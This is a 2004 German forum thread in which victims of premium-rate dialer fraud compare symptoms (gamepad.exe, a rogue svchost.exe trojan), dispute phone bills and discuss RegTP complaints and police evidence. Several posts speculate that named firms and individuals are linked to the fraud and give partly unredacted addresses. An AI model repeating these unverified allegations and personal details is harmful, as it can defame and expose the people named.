Ich bin ja nicht so ganz unbeleckt in dieser Branche und werde mich mit aller Macht dagegenstemmen. Doch was passiert mit denen die keine Ahnung haben, nur einfache User sind und noch nicht einmal einen Einzelgesprächsnachweis angefordert haben? Ein Wahnsinn!!!
Der nette BT Mitarbeiter hat sich bemüht zu erklären was vorgefallen ist, dass es kein Trojaner ist, von mir eine kostenpflichtige Seite aufgerufen wurde, die mit einem erneuten Einwählen nix zu tun hätte, ich wäre mit Sicherheit darauf hingewiesen worden, dass sie kostenpflichtig ist, da dieser Dialer ja bei der REGTP ordnungsgemäß gemeldet ist, es im Januar zwar Probleme gab, da es zu diesem Zeitpunkt noch nicht rechtmäßig gewesen ist, aber nun alles i.O. ist usw.... mir die komplette Adresse von Herrn M. P. genannt und mich an die Adresse von REGTP verwiesen.
Mein Weg ist nun, mich dort zu erkundigen und nach dem Status zu fragen. Sicherlich muß dort nach euren Aktionen schon was im Gange sein. Danach werden wohl oder übel rechtliche Schritte folgen müssen. Schauen wir mal...Ich halte Euch aber auf dem Laufenden....
Hat jemand noch eine zusätzliche Empfehlung für meinen Status?


mfg
ein ziemlich verärgerter Internetuser mit einer Stinkwut im Bauch

*[Virenscanner: Namen entfernt]*


----------



## TSCoreNinja (22 April 2004)

*Re: 090090000606 - die nummer zum glück*



			
				kurt dialer schrieb:
			
		

> merkwürdigerweise hatte ich dann auch diverse trojaner: TR/ByteVerify.1.A,
> TR/ByteVerify.1.B,
> TR/ByteVerify.1.D: schön verpackt in einem file count[1].jar (BlackBox.class, Dummy.class, VerifierBug.class) in den temporary internet files;


@kurt dialer,
falls moeglich, bitte mal das Jar File anschauen, und schreiben, welche Dateien dort drin stecken. Insbesondere exe sind interessant, aber auch eine Liste der class Files. Evt anmelden und mit mir Kontakt aufnehmen, haette eigentlich gerne das Teil. Als Hintergrund, z.B. der Matlock Dialer ist  so auf die Platte gekommen, Details zur Sicherheitsluecke vom Verantwortlichen  Hersteller
Gr,
TSCoreNinja


----------



## Anonymous (23 April 2004)

*09009000928*

Habe 40 euro plus märchensteuer bezahlen müssen! konnte aber eine Adresse in Deutschland vom Anbieter BT Gmbh&co.ohg, Barthstrasse 22 in 80339 München bekommen.
Die Adresse zur Nummer 09009000928 lautet:
......
Schlossbergstr. 37
55411 Bingen am Rhein

...mehr weiss ich auch noch nicht, aber .....der Kampf geht weiter! 
 :evil: Fuck the dialer

_Persönliche Daten gelöscht 
http://forum.computerbetrug.de/rules.php#9
tf /moderator_


----------



## Anonymous (23 April 2004)

*090090000928*

hallo ich habe das gleiche Problem gehabt , allerdings hat mein 0190/0900
warner die verbindung geblockt außerdem habe ich noch die 0900 und 0190 nummern via telefonanbieter gesperrt 

dh ist gab es glücklicherweise keinen  schaden! das war aber  auch schon mal anders (1SMS=17€ aber das war meine Freundin ) hoffe ich !

dieser Dialer  wurde bei mir nur durch  klicken auf einen link gestartet 
ohne alles !!!!! kein _OK kein Download !!!

war das bei euch auch so ???


----------



## Aka-Aka (23 April 2004)

*Re: 09009000928*



			
				Anonymous schrieb:
			
		

> ...konnte aber eine Adresse in Deutschland vom Anbieter BT Gmbh&co.ohg, Barthstrasse 22 in 80339 München bekommen.
> Die Adresse zur Nummer 09009000928 lautet:
> ......
> Schlossb***str. 37
> ...




*Cicojores kleine Märchenstunde: Heute "Rumpelstilzchen c/o Frau Holle"*

In den letzten Wochen wird im Forum "wallstreet online" des öfteren eine Aktie zum Kauf empfohlen... 


			
				angebliches Pseudonym des CEOs schrieb:
			
		

> Mittelfristig kann das Potenzial mehrere 100% betragen





			
				Kritiker schrieb:
			
		

> Naja, wenigstens stehen im Titel jetzt nicht mehr die absurden 1000 Prozent



Diese Firma hat zwei Firmenadressen:
Schlossb*** 37
Bingen

und
435 North D*** Hwy.
Dover, DE 19903

Die Adresse des Registrierungsverpflichteten des nicht vorhandenen (?) dialers zu 090090000928 lautet

435 North D*** Hwy.
Dover, DE 19903

Die Adresse des Vertretungsberechtigten zu 090090000928 lautet

435 North D*** Hwy.
Dover, DE 19903

Die Firma, die INhaber der Nummer 090090000193 ist (siehe  INfos hier ) ist Moldconecta in Moldawien.

Die Moldconecta gehört auch  in diesen Thread , hier ist der Vertretungsberechtigte der registrierungsverpflichteten Firma Moldconecta wiederum

MP
Schlossb***str. 37:
Bingen.

Dann gibt es noch den Peter-Huth-Beitrag zum  "Dialer, der aus dem Nichts kam" . In diesem Beitrag wird Rudy K. erwähnt.

Der wiederum ist der Inhalteanbieter zuim Dialer unter 090090000928, der wiederum das identische Adressierungsmerkmal zum Moldconecta-Dialer unter 019084105502 hat. An diesem Ort gibt es aber im Moment einen Hinweis auf eine Schweizer Firma und einen popeligen aconti-Dialer aus Gladbach, der eine völlig andere Nummer wählt (090090000474 glaub ich, vertretungsberechtigt ist ein Herr Woitin*** aus der Schweiz, Inhalteanbieter ist aconti in der Schweiz --> Verstoss gg. RegTP, da kein deutscher Name??? Der Inhalteanbieter kommt aus Liechtenstein, Partnerfirma einer tschechischen Firma und insgesamt Partner einer Firma aus Las Vegas/Wien/Hongkong)

Die Adresse in Dover (*** North Dupont Hwy.
Dover, DE 19903) taucht aber noch an anderen interessanten Stellen auf:

z.B.: hier:

als  anbieter bei der Nummer 090090000049 

nicht weiter erstaunlich, da es sich um den Inhalteanbieter des GN-Partnerprogramms handelt (Quelle nicht verlinkt, da kommerziell),

Business M***
*** North Dupont Highway 
Dover, DE - 19903 - USA 

Wobei die entsprechende Werbeseite dieses PPs noch vor kurzem einen anderen Partner nannte, nämlich die "Consul Info", jene spanisch-niederländisch-pulheimerisch-kölnerisch-panamaisch-pragerische Hydra... 

Irgendwie erstaunlich, denn diese Seite gehört offenbar zur Firma "Questnet", die wiederum inzwischen offiziell die Dialer der GN stellt.

Und wenn all diese Informationen für Beteiligte auch VÖLLIG OHNE BEDEUTUNG sind, so sind sie doch sehr spannend, auch um einigen Leuten mal zu erklären, was da eigentlich für ein großangelegtes Versteckspiel betrieben wird... (neben der, aus meiner Sicht, eklatanten Verarsche der RegTP)

Vielleicht ist das hier ein Paradebeispiel für meine These von "Rumpelstilzchen c/o Frau Holle"...

Außerdem ist es, mit Verlaub, die Möglichkeit, fast ALLE Großen des Geschäfts in einem einzigen Beitrag zu nennen, ohne Themaverfehlung... (wenn auch andererseits völlig ohne Nutzen...) - und das alles ohne einen Hauch von Betrugsvorwurf...

cj


----------



## Tostan (23 April 2004)

Hallo,

Vermutlich andere Masche des dialers:

- Startseite des IE verändern (kryptische URL im Unicode)
- nachladen der gamepad.exe von dort und umleitung auf irgendeine suchseite (ohne extra-klick, ohne Abfrage, völlig im hintergrund!)
- trennen der Verbindung und anwahl von 090090000928 bzw. 090090000606
  ( 090090000928 ist nachvollziehbar im 0900warner-log, 090090000606 taucht nur auf der Rechnung auf (vor installation des warners))
- löschen der gamepad.exe 

dummerweise wurde die Startseite wieder geändert, ohne die alte zu sichern (die masche kannte ich noch nicht  )
Seitdem ist zwar ruhe mit dem dialer, aber ich hab keine Beweise 
(Dateien wie hier im Forum beschrieben, also 25kB win-Systemdateien am falschen Ort, sind nicht aufzufinden.)

Falls jemand diese gamepad.exe, bzw. die anderen Dateien sichern konnte, würde ich mich über post freuen, damit ich ein paar beweise hab, dass die einwahl nicht wissentlich über ihre "registrierten" dialer erfolgte.

Tostan


----------



## Yajiv (23 April 2004)

Hi,

leider bin ich auch ein Opfer dieser Dialer geworden. Habe erst gestern erfahren, das ich anscheint zweimal (2 x €24,94)dieser Nummer gewählt hätte. 

Ich würde mich freuen wenn ein oder der andere mir paar Tips geben könnte wie Mann dagegen wehren kann.

Gibt es neuigkeiten diesbezüglich von der RTP
Vielen Dank im voraus


----------



## Anonymous (23 April 2004)

Tostan schrieb:
			
		

> Hallo,
> 
> Vermutlich andere Masche des dialers:
> 
> ...



090090000606:
vertretungsberechtigt ist:
MP, Schloßb***str, Bingen,...


----------



## Tostan (23 April 2004)

Anonymous schrieb:
			
		

> Tostan schrieb:
> 
> 
> 
> ...



Hab auch schon nachgeschaut ...
Bei regTP sinds unterschiedliche Adressen zu beiden Nummern, hat mich etwas gewundert. 

Aber auch die *606 tauchte hier im Thread schon auf, und es würde mich doch wundern, wenn auf dem Rechner zwei dialer drauf versteckt wären.

Zuerst wurde nur die *606 angerufen, später dann nur *928 ... da der Dialer ja immer frisch aus dem Netz kommt, kanns durchaus derselbe gewesen sein.

Dummerweise hat der, der an dem Rechner normalerweise arbeitet, nicht bemerkt, dass die Startseite des IE über mehr als zwei Monate verändert war.
Aber da glücklicherweise der alte Netscape 4.7 Standard-Browser war, und der IE nur benutzt wurde, wenn mal wieder ne Seite mit dem Netscape nicht darstellbar war, ist der Schaden wesentlich geringer, als er sein könnte.

Tostan


----------



## TSCoreNinja (23 April 2004)

(NB, leider habe ich das Original Posting zerstoert, da Editieren statt zitieren gedrueckt...
Hier standen mal wilde Spekulationen zu einer Andloadsmore Limited, die den in der RegTP Datenbank zur 0900-90000606 genannten Mitgliederspielplatz betreiben u in den USA schon einschlaegig bekannt waren Einziger Ueberrest ist dieser Satz:  

Ich denke, wir sollten Wetten darauf abschliessen, wie lange die RegTP diesmal braucht, um dem Treiben ein Ende zu bereiten. Mein Tipp: nicht vor Anfang Oktober.


----------



## Aka-Aka (23 April 2004)

Das scheint ja offenbar tatsächlich ein durch und durch geniales System zu sein und offenbar gibt es auf der Seite der "Guten" (mit allerlei ???) noch keinen, der den Fehler in dem System gefunden hat, den es geben muss, damit man etwas dagegen tun kann...

Mag sein, dass es keinen Fehler gibt...

cj


___________


zurück zu den Betroffenen:

Im Moment führt der Weg eigentlich nur über die Registrierungsbehörde, dort müssen sich möglichst viele Leute beschweren, damit da was unternommen werden kann. Dazu wäre es sicher hilfreich, wenn jemand das so aufbereitet tun könnte, wie möglich. 

Nichtsdestotrotz kommt es auf jede einzelne Beschwerde an, um den Apparat der RegTP erst einmal in Bewegung zu setzen.

Die Hirngespinste in Richtung "Weltverschwörungstheorie" können höchstens Autoren von Wirtschaftskrimis als Inspiration nehmen. Vielleicht heisst GRishams nächster Roman ja "Das Netz"


----------



## TSCoreNinja (23 April 2004)

BTW, @ alle Betroffenen:
wer eine Adresse kennt, die zu der Einwahl fuehrt, bitte per PN zuschicken, kann evt. mal wieder ein nettes Video erzeugen  Geht trotz Zeitmangel zur Not auch in der Kaffeepause, kriege langsam Uebung. Und bin doch mal neugierig, wie diesmal die Technik aussieht.
Gr,
TSCoreNinja


----------



## Tostan (23 April 2004)

TSCoreNinja schrieb:
			
		

> wer eine Adresse kennt, die zu der Einwahl fuehrt, bitte per PN zuschicken,
> TSCoreNinja



tja, hätt ich nur nicht voreilig die Startadresse geändert. 

Gibt es eine Möglichkeit, eine "alte" Start-url noch irgendwo auszulesen? (IE 5.5) Windows speichert doch sonst auch alles ewig.

Auch im Verlauf war keine URL zu finden, die zur Einwahl führt (also die alte Start-URL z.B.) 

Tostan


----------



## TSCoreNinja (24 April 2004)

Tostan schrieb:
			
		

> TSCoreNinja schrieb:
> 
> 
> 
> ...


Verlauf ist meines Wissens einzige Moeglichkeit. Andererseits hat Matlock den Verlauf erfolgreich geloescht, und zwar komplett. Gibts noch etwas von vor der Einwahl? Kann mich zwar noch nicht ganz entscheiden, von der gleichen Masche auszugehen, aber scheinbar gibts auffaellig viele Parallelen

TSCoreNinja


----------



## Anonymous (24 April 2004)

Habe auch noch rausgefunden, daß der Dialer ...00928 auch die Cookies löscht. Nachdem mein Dialerwarner angesprungen ist und den Verbindungsaufbau unterdrückt hat, muss ich mich auf Seiten, auf denen ich registriert bin, jedesmal wieder neu einloggen, obwohl dies eigentlich automatisch gehen sollte beim Aufruf der Seiten. Ich habe jetzt immernoch keine Möglichkeit gefunden, diesen Dialer auf meinem System unschädlich zu machen, nur mein 0900er-Warner, der immer anspringt, schützt mich vor größerem Schaden. Kann mir irgendjemand erklären, was ich wo in der Registry löschen muss? Kenne mich in dieser Materie nicht ganz so gut aus. 

Wenn ich auf der nächsten Telefonrechnung etwas entdecke, daß der Dialer verursacht hat, wie muß ich mich verhalten? Telekom bucht per Lastschrift ab... Muss ich eine Mail dann an die RegTP schicken, und wenn ja, was muss in die Mail alles rein? Als einzigstes Log hab ich nur die Verbindungsunterdrückung vom 0900er-Warner als .txt-Datei. Aber das wird ja wohl kaum reichen. Ich habe nie auf einen OK-Button o.ä. geklickt und auch auf einer anderen Art hat sich der Dialer nicht angekündigt. Plötzlich war meine Verbindung gekappt und eine neue Einwahl über die ominöse gamepad.exe hat stattgefunden....


----------



## Anonymous (24 April 2004)

So, hab gerade mit TrendMicro mein System gescannt und hab da folgendes gefunden:TROJ_SMALL.X in der svchost.exe im System-Ordner.
Beschreibung bei TrendMicro dazu: 
This memory-resident Trojan is a downloaded file of TROJ_SMALL.W. It also attempts to download files, which are often malware, from several servers and then execute the said files. 

Dieser Trojaner lädt also Dateien im Hintergrund herunter und führt diese aus. Kann es sich da vielleicht um unsere gamepad.exe handeln? Diese svchost.exe im Systemordner wurde ja auch schon des öfteren hier erwähnt...

Konnte die gefundene Datei nicht gleich löschen, weil sie gerade verwendet wurde. Nachdem ich im Taskmanager die Datei aber beendet hatte, ließ sich die svchost.exe problemlos von TrendMicro entfernen.

Hier der Link von TrendMicro zu TROJ_SMALL.X:
http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?VName=TROJ_SMALL.X


----------



## PaX (26 April 2004)

Niggl schrieb:
			
		

> Dieser Trojaner lädt also Dateien im Hintergrund herunter und führt diese aus. Kann es sich da vielleicht um unsere gamepad.exe handeln? Diese svchost.exe im Systemordner wurde ja auch schon des öfteren hier erwähnt...



Hallo!

Tja, das ist ja die Sache, die ich meine: dieser Dialer führt sich auf wie ein Virus - mit dem Unterschied, dass sich darüber auch noch Leute bereichern...!

Ich habe inzwischen die Telekomrechnung bekommen mit (dann doch 'nur') 10 EUR für die 090090000928. Das sind zehn EUR, die ich denen nicht gönne, wo sich aber die Frage stellt, ob sich der Aufwand des Widerspruchs lohnt. Mit all den Gebühren, die dabei anfallen, is man ja schnell über diesen 10 EUR. 

Ich würde denen aber gern in den A**** treten und bin immer noch wegen dem Staatsanwalt am überlegen, weil:

 das ein groß angelegter Betrug ist und darüber auch bei niemandem ein Zweifel besteht (auch nicht bei der RegTP).
auf meinem PC durch den Dialer weitere Viren nachgeladen wurden und damit haben wir eigentlich einen direkten Ansprechpartner/Verantwortlichen für einen Virenbefall.

Ich werde da nochmal mit meinem Anwalt und dem Staatsanwalt drüber meditieren.


----------



## Anonymous (26 April 2004)

Nachdem ich die svchost.exe aus dem Systemordner entfernt habe, hat sich seither kein Dialer mehr versucht einzuwählen. Jetzt greifen also schon die Dialerverbreiter zu den absolut hinterhältigsten Methoden, um sich jede Menge Geld zu erschleichen. Die Frage ist allerdings, ob die Dialeranbieter wirklich so dumm sind und solche Aktionen bewusst anwenden, da ja ersichtlich ist, daß sie sich vermutlich eines Trojaners bedienen.


----------



## Tostan (27 April 2004)

TSCoreNinja schrieb:
			
		

> Verlauf ist meines Wissens einzige Moeglichkeit. Andererseits hat Matlock den Verlauf erfolgreich geloescht, und zwar komplett. Gibts noch etwas von vor der Einwahl? Kann mich zwar noch nicht ganz entscheiden, von der gleichen Masche auszugehen, aber scheinbar gibts auffaellig viele Parallelen
> TSCoreNinja



scheint so zu sein, denn der Verlauf umfasste nur noch Adressen vom Tag als ich es erfahren habe. (da es nicht mein Rechner ist weiss ich nicht, ob da niemand die letzten Tage den benutzt hat, oder ob er gelöscht wurde)
... scheint ja ein echt "cleverer" Dialer zu sein, eklig sowas 

Tostan


----------



## Anonymous (1 Mai 2004)

Hm......
Grad der 0900er-Warner wieder angesprungen, wieder die gamepad.exe, diesmal allerdings die Nummer 090090000606.
Ich dreh jetzt dann so langsam durch. Achja, svchost.exe is wieder im Windowsverzeichnis gewesen...


----------



## Anonymous (1 Mai 2004)

*Hilfe!!!*

Hallo Community,

also nachdem gestern die Telefonrechnung kam traf mich fast der Schlag. Ich hätte irgendwie die Nummer 09009 0000128 gewählt,am 15.04 und am 17.04. Die Summe beläuft sich auf insgesamt 40 €. Und das ist auch Geld. Jetzt die Frage: was soll ich tun. Denn sofort danach hab ich nen Virenscan gemacht und da war eine Datei gamepad.exe. Und dann schaute ich in dieses Forum dass das wohl der Dialer war. Jednefalls weiß ich nicht was ich genau tun soll. Die Firma ist Nexnet,an sie hab ich bereits die Frage gestellt was für eine Verbindung ich getätigt habe.
Aber ich bin mir sicher ich hab das nicht freiweillig gemacht. Vor ein paar Monaten hat mir ein Freund den Tip gegeben immer mit Anti-Spyware Progs zu arbeiten. Das tue ich auch,und mit dem Virusscanner,aber trotzdem hat sich der Dialer irgendwie eingeschlichen. Und ich möchte das Geld nicht bezahlen,da das Ganze sehr dubios ist und bei vielen anderen vorkam. Wenn ich die Nummer bei der RegTP in dem einen Formular eingebe kommt dasselbe wie am Anfang des Topics,Vereinigte Staaten von Amerika usw. 
Ihr habt das ja hoffentlich gut überstanden...was soll ich tun?wäre wirklich sehr dankbar für jede Hilfe.


----------



## TSCoreNinja (1 Mai 2004)

*0900 90000128*

@Georg

Wenn Du diese gamepad.exe hast, bitte mal zusenden. D.h. anmelden, und mir ne PM schicken, dann kriegst Du meine Mailadresse. Auch an evt bekannten Links, wo der Dialer eingesetzt wurde (History anschauen), waere ich sehr interessiert

Uebrigens liefert RegTP Datenbank http://bo2005.regtp.de/prg/srvcno/dialer.asp  derzeit keine Eintraege zu 0900-90000128 keine Ahnung ob das deren Probleme sind, oder ob kein Dialer registriert ist. Dann  besteht kein Zahlungsanspruch! 

Viel Erfolg,
TSCoreNinja


----------



## Anonymous (1 Mai 2004)

Niggl schrieb:
			
		

> Hm......
> Grad der 0900er-Warner wieder angesprungen, wieder die gamepad.exe, diesmal allerdings die Nummer 090090000606.
> Ich dreh jetzt dann so langsam durch. Achja, svchost.exe is wieder im Windowsverzeichnis gewesen...



Die 090090000606 war schon mal da... (dritte Seite dieses Threads, as fas as I can remember)

Wer sich unter der 090090000928 wundert, nur eine Firma in den USA zu finden, kann gerne unter der  090090000606 nachschauen, da ist "Bob Back" nicht mehr so weit.

(Das so genannte Addressierungsmerkmal unter 090090000928 führt zur Nummer ...474)


----------



## Reducal (1 Mai 2004)

Anonymous schrieb:
			
		

> da ist "Bob Back" nicht mehr so weit.


Wenn ich mich nicht irre ist das aber ein Anwalt, der lediglich als der erforderliche Zustellbevollmächtigte für die RegTP fungiert.


----------



## Aka-Aka (1 Mai 2004)

Reducal schrieb:
			
		

> Anonymous schrieb:
> 
> 
> 
> ...



ich weiss schon, dass es nirgends Verantwortliche gibt, nur überall Kassierende... das widerspricht aber nun mal meiner (ich betone MEINER) Auffassung von Rechtmäßigkeit...

Wer verdient, haftet.

cj


----------



## Reducal (1 Mai 2004)

Ich sehe da einen kleinen Unterschied zwischen Mitverdiener und Mitstörer oder Mittäter. Der eine gibt dem anderen den Auftrag dessen Post in Empfang zu nehmen und an ihn weiter zu leiten - wo liegt das Problem bei dieser Art eines Zustellungsbevollmächtigten?


----------



## Aka-Aka (1 Mai 2004)

Ich glaube, dass man es im Moment schlicht noch nicht weiß, welche Rolle welche Firma/Person mit der ominösen Adresse in Dover, Delaware spielt. Aber ich warte mit allergrößter Spannung auf die Aufklärung des Rätsels, v.a. seit ich in Dover, Delaware mit ein paar höchst aufschlussreichen Anrufbeantwortern telefoniert habe 

cj


----------



## Anonymous (2 Mai 2004)

@ TSCoreNinja

Danke für die Tipps. Aber nachdem ich gesehen habe,dass auf meinem PC ein Dialer ist(nach dem Öffnen der Telefonrechnung) hab ich erstma Panik gekriegt und meinen PC gründlich gesäubert. Das Anti-Vir-Programm hat gamepad.exe gelöscht. Die History ist auch weg. 
Aber soweit ich weiß muss die Firma ja erst genau nachweisen dass ich freiwillig und bewusst die Verbindung hergestellt habe..da ich das aber nicht gemacht habe wirds wohl bei denen lange dauern...
Das mit der Nummer in der Datenbank is schon ominös..aber ein weiterer Beweis für die Unseriösität dieser Leute.


----------



## Anonymous (2 Mai 2004)

TSCoreNinja schrieb:
			
		

> Die Adressierungswebseite der 090090000606 wird nicht von Unbekannten im Dialergeschaeft betrieben.



Wie kommt man nun genau von der 090090000928 auf die 090090000606? 

@090090000606: Das ist ja wirklich mal ein netter Verein... 

Mitgliederspielplatzgoogeln führt zu dialer-PP, dialer-PP führt zu britischem dialer-PP-Partner und der ist aber nun wirklich nicht nett. Ein Klick auf seinen Produktelink bringt Antivir zum Piepsen... PFUI!

cj


----------



## Aka-Aka (2 Mai 2004)

Sorry, der Beitrag eins drüber ist von mir und da steht über die Einwahlnummer noch der Adressierungslink... Kann gerne editiert werden. Die Hinweise auf die Seiten sind hoffentlich so formuliert, dass jeder selbst wissen muss, ob er sie finden will. Ansonsten kann das gerne ins linkforum !
cj


----------



## TSCoreNinja (4 Mai 2004)

Reducal schrieb:
			
		

> Anonymous schrieb:
> 
> 
> 
> ...


@Reducal:
Nein, ich glaube, Du irrst Dich diesmal. Der Mensch in Bingen scheint Kaufmann zu sein (Jahresbericht eMind AG), und der Anwalt sitzt in Delware in diesem Buero, siehe angehaengtes Bild...

Im Impressum, der eMind Group, die zur Life and ART Group gehoert, kann man die Rollenverteilung nachlesen. Die Nummer 90090000606 ist auf den Aufsichtsratsvorsitzenden registriert. Der Vorstandsvorsitzende ist vermutlich auch der Geschaeftsfuehrer der Premium Call GmbH, die bei einer Google Suche interessante Ergebnisse liefert. Die haben schon von den Briten eins ueberbekommen. Da ist das Geschaeftsklima in Delaware viel besser


			
				Best Investment Company schrieb:
			
		

> Wir bieten die Gründung einer amerikanischen Incorporated ausschließlich im Bundesstaat DELWARE in den USA an. (...)
> Man genießt definitive Haftungsfreiheit ohne gesetzliche Lücken.(...)Delaware bietet zudem die klassische Offshore - Besteuerung.


Interessant ist, das die beiden Herren von der eMind Ag wieder im WhoIs Eintrag der Best Investment Company , Life and Art Group sowie der Life and Art Holding auftauchen. Scheinbar gehoert auch noch eine PrimeTel AG zum Spiel. 
Wen es interessiert, dem liefern die Jahresberichte interessante Details, da die ja den Aktionaeren gegenueber Rechenschaft schuldig sind. 

Frage an juristisch Kundigere: waere dem Treiben nicht eventuell auch durch einen Hinweis an die Steuerbehoerden nachzuhelfen? Ab wann gilt so etwas eigentlich als Briefkastenfirma?
Gruesse,
TSCoreNinja

PS: an dieser Stelle sei noch vermerkt/in Erinnerung gerufen, dass die Rufnummer 0900-90000986 des Herr B.S., Sozius eines bekannten Freiherrn und Rechtsanwalts natuerlich rein zufaellig ebenfalls in Delaware ansaessig ist, ebenso wie die zuvor von Aka Aka benannte 0900-90000049.



			
				Impressum eines IQ Tests schrieb:
			
		

> Business Marketing, Inc.
> 435 North Dupont Highway
> Dover, DE - 19903 - USA


----------



## Anonymous (4 Mai 2004)

Die Nummer von MP in der whois einer Seite führt

hierher
http://www.cdedc.org/index2.html

cj


----------



## Anonymous (5 Mai 2004)

*noch ein Opfer*

Hallo, hier meldet sich noch ein Opfer dieser 0900er Nr. Ich werde bei
jedem Verfahren gegen diese (...) mitmachen.

_Beleidigungen bringen niemanden weiter - Heiko_


----------



## sherlock70 (5 Mai 2004)

@Madjid:
Das Verfahren wirst Du schon selber führen müssen (evtl. unter Zuhilfenahme Deines Anwalts). Es gibt in D numal keine Sam...

 0 
Puh, da hätte ich es doch fast gesagt, das böse S-Wort.

Aber hier wirst Du reichlich mit Tipps und Formschreiben versorgt. Also: Viel Erfolg!!

Sherlock


----------



## Anonymous (5 Mai 2004)

*Wie bekommt man die gamepad.exe weg?*

Hallo!
Auch ich bin "Opfer" dieses Dialers. Vor zwei Wochen etwa versuchte der Dialer immer ungefragt eine Onlineverbindung zu erstellen. Zum Glück konnte ich das mit YAW noch immer rechtzeitig unterbinden. DOCH: Ein Dialerscann ergab -wie auch bei einem anderem hier- keine Treffer. 
Ich dachte eigentlich schon, dass der Dialer sich selbst gelöscht hat, da ich nach einer Zeit keine Angriffe mehr hatte. Aber gerade eben versuchte er es wieder.

Deshalb habe ich eine frage: Wie bekomme ich die gamepad.exe weg? (Habe XP)


----------



## HenningHÖ (5 Mai 2004)

*Ich auch*

Mich hast auch erwischt!!!.....0928

Hat sich jetzt irgentwas ergebn mit der Regtp muß ich wohlmöglich zahlen? einspruch ist erhoben, hab jetzt Zeit bis zur Mahnung.

Ich hab schon versucht nachzuvollziehen woh ich mir den dialer eingefangen hab habe aber nix gefunden.

Jetzt hab ich aber noch ne gute Nachricht!!! Meine Eltern, (dessen Aschluß es ist) haben ne rechtsschutzversicherung.Mein Vater (Rentner  :lol: ) hat auch schon gesagt das es sich von diesen ***** ****** ***** *** woh käme mann denn hin sich von  solchen ****** **** ***  

Ich hab jetzt das Problem das ich meinen Rechner nicht weggeben mag (schreib gerade Diplomarbeit) .
Was brauch ich für die anzeige ? und könnt ihr mir dabei helfen?
Ich stelle mir das so vor :
Gebt mir nen link, ich lauf nochmal ( diesmal hämisch grinsent ) in die dialerfalle, dabei schaut mir der Stattsanwalt über die Schulter und zack kriegt der Dialermann (hoffetlich) eins aufm ****

Ich bräuchte also nen link und am besten noch den trojaner bzw. gamepad.exe . (hab bei mir nix gefunden  )


----------



## Reducal (5 Mai 2004)

*Re: Ich auch*



			
				HenningHÖ schrieb:
			
		

> Ich hab jetzt das Problem das ich meinen Rechner nicht weggeben mag (schreib gerade Diplomarbeit) .
> Was brauch ich für die anzeige ? und könnt ihr mir dabei helfen?
> Ich stelle mir das so vor :
> Gebt mir nen link, ich lauf nochmal ...


Zu einer Anzeige gehört prinzipiell der Rechner als Beweismittel. Die Daten werden dann forensisch geischert und durch einen EDV-Sachverständigen ausgewertet. So sollte es zumindest sein! Alles andere ist den Weg zu den Behörden nicht wert, derartige Verfahren sind nämlich von Haus aus zur Einstellung verdammt, da es an gerichtsverwertbaren Beweisen fehlt.
Was das mit dem Link und nochmaliger Produktion der Session betrifft, so veriß´ es! Du würdes unter Umständen selbst dem Tatbestand des Vortäuschen einer Straftat unterliegen und außerdem sind derartige Beweise nicht tauglich, da sie mit der tatsächlichen, schädigenden Einwahl nicht übereinstimmen.


----------



## Stalker2002 (5 Mai 2004)

*Re: Ich auch*



			
				Reducal schrieb:
			
		

> Zu einer Anzeige gehört prinzipiell der Rechner als Beweismittel. Die Daten werden dann forensisch geischert und durch einen EDV-Sachverständigen ausgewertet.



Heisst das, er muß entweder auf die Anzeige oder auf die Diplomarbeit verzichten? Das kann's doch nicht sein, das ein unabkömmlicher Computer dafür auf die Reise gehen muß.

MfG
L.


----------



## Reducal (5 Mai 2004)

Wenn der Anzeigenerstatter es ernst meint, muss er Prioritäten setzen - ich persönlich würde eher meine Arbeit schreiben und mich vorallem zivil mit dem Problem auseinander setzen - die Behörden haben dahingehend noch nicht allzuviel zerrissen.
Wie sollen, ohne Beweismaterial, die Ermittlungen erfolgen? Es gibt keinen Richter in Deutschland, der bei Dialersachen bislang einen Durchsuchungsbeschluss unterschrieben hätte, nur weil ein Anzeigenerstatter eine Behauptung aufstellt. Zudem gab es auch noch keinen StA, der so einen Beschluss beantragt hätte - das wäre hier längst zu lesen gewesen. Diese Diskussion hatten wir hier schon oft. Im Strafverfahren gibt es kein Gutdünken - da sind die Spielregeln um einiges enger gesteckt, als in zivilen Verfahren.
Angesichts derartiger "Erfahrungswerte" kann sich der eventuelle Anzeigenerstatter überlegen, was er gedenkt zu tun und in wie weit er ggf. die Ermittlungen unterstützen will, wenn er bereits vorab das Ergebnis für den Ausgang des Verfahrens selbst in großem Maße beeinflussen kann.


----------



## Stalker2002 (5 Mai 2004)

Dann sollen die Behörden(Kripo) halt einen Außendienstler mit einer mobilen Datensicherungslösung vorbeischicken. Dann werden die Beweise "amtlich" vor Ort gesichert und der Geschädigte hätte nicht noch mehr unter Dingen zu leiden, die der Dialerverbrecher zu verantworten hat. Es hat nicht jeder das Geld, sich einen zweiten Computer zu leisten, nur weil es die Beweissicherung erfordern könnte.

MfG
L.


----------



## Marnie (5 Mai 2004)

Stalker2002 schrieb:
			
		

> Dann sollen die Behörden(Kripo) halt einen Außendienstler mit einer mobilen Datensicherungslösung vorbeischicken. Dann werden die Beweise "amtlich" vor Ort gesichert und der Geschädigte hätte nicht noch mehr unter Dingen zu leiden, die der Dialerverbrecher zu verantworten hat. Es hat nicht jeder das Geld, sich einen zweiten Computer zu leisten, nur weil es die Beweissicherung erfordern könnte.
> 
> MfG
> L.



Als ich damals bei der Polizei anrief, um mich vorab wegen einer Anzeige zu erkundigen und was dafür nötig sei, erklärte man mir, ich müsse zu Beweiszwecken den Rechner bei ihnen abliefern, ohne ginge nichts. Auf meine Frage, wie lange ich auf den Rechner verzichten müsse, sagte man mir, dies könne WOCHEN dauern. Auf den Gedanken, nach einem Außendienstler zu fragen, bin ich überhaupt nicht gekommen. Mich hat allein schon die lange Abwesenheit meines PC´s abgeschreckt.


----------



## Reducal (5 Mai 2004)

Ein Außendienstler, was/wer soll denn das sein? Außerdem werden die s. g. Encase-Sicherungen über die Server in den speziell dafür eingerichteten Beamtenstuben gefahren.

_Damit ist von meiner Seite aus genug zu diesem Thema geplaudert. Beim nächsten "Tag der offenen Tür" werde ich mich bei meiner Polizeibehörde noch etwas tiefgründiger umschauen und noch detailiertere Fragen stellen._


----------



## Stalker2002 (5 Mai 2004)

Reducal schrieb:
			
		

> Ein Außendienstler, was/wer soll denn das sein?



Ein Außendienstler wäre dann wohl eine umgehend zu schaffende Einrichtung, da es ja nicht angehen kann, das z.B. ein Gewerbetreibender seine Tätigkeit über Wochen einstellen muß nur um sich gegen Computerkriminalität zu wehren. Den Arbeitsausfall kriegt er ja nie wieder ersetzt, vor allem wenn das Verfahren eigestellt wird.
